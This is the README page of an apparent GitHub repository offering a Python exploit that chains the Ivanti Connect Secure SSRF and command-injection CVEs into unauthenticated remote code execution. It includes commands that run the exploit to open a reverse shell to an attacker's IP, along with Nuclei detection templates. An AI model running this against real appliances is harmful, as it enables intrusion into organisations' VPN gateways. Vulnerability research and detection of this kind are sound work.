Skip to content

Chocapikk/CVE-2024-21893-to-CVE-2024-21887

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
CVE-2024-21893-CVE-2024-21887.yaml
CVE-2024-21893-CVE-2024-21887.yaml
 
 
CVE-2024-21893.yaml
CVE-2024-21893.yaml
 
 
README.md
README.md
 
 
exploit.py
exploit.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Introduction 🌐

This repository contains a Python script designed to exploit the SSRF vulnerability (CVE-2024-21893) and command injection vulnerability (CVE-2024-21887) in Ivanti Connect Secure appliances. On January 31, 2024, these vulnerabilities were disclosed by Ivanti, and have been actively exploited by chaining them together to achieve unauthenticated remote code execution.

Background 📜

Ivanti Connect Secure and Ivanti Policy Secure were found to be susceptible to a series of vulnerabilities that could be exploited by an attacker to gain unauthorized access and execute arbitrary code. A detailed analysis by Rapid7, published on January 12, 2024, provides an in-depth look at these vulnerabilities.

Ivanti released a series of mitigations and, as of February 1, 2024, official patches to address the vulnerabilities. It is highly recommended to apply the official patches to secure the systems against these vulnerabilities.

Exploit Script Usage 🛠️

To use the exploit script, you will need Python 3 and the following dependencies installed:

  • requests
  • pwncat
  • rich

Installation 📥

  1. Clone the repository:
git clone https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887
  1. Navigate to the cloned directory:
cd CVE-2024-21893-to-CVE-2024-21887
  1. Install the required dependencies:
pip install -r requirements.txt

Running the Exploit 🚀

Use the following command to run the exploit script:

python exploit.py -u <TARGET_URL> -rip <REVERSE_SHELL_IP> -rport <REVERSE_SHELL_PORT>

Replace <TARGET_URL> with the base URL of the vulnerable server, <REVERSE_SHELL_IP> with your IP address for the reverse shell, and <REVERSE_SHELL_PORT> with the port you wish to use for the reverse shell.

Example 📝

python exploit.py -u https://vulnerable-server.com -rip 192.168.1.10 -rport 1337

Nuclei Templates Usage 🧬

This repository also includes Nuclei templates to detect the SSRF (CVE-2024-21893) and RCE (CVE-2024-21887) vulnerabilities.

Running Nuclei Templates 🖥️

To use the Nuclei templates, ensure you have Nuclei installed and up-to-date.

  1. Detect RCE vulnerability with the CVE-2024-21893-CVE-2024-21887.yaml template:
nuclei -l file.txt -t ./CVE-2024-21893-CVE-2024-21887.yaml
  1. Detect SSRF vulnerability with the CVE-2024-21893.yaml template:
nuclei -l file.txt -t ./CVE-2024-21893.yaml

Disclaimer ⚠️

This tool is intended for security research and should only be used with explicit authorization from the target organization. Unauthorized use of this tool and its associated techniques for malicious purposes is illegal and unethical.

Remember to use these tools responsibly and ethically, and always have permission before testing someone else's systems. 🛡️

About

CVE-2024-21893 to CVE-2024-21887 Exploit Toolkit

attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis

Resources

Readme
Activity

Stars

22 stars

Watchers

2 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages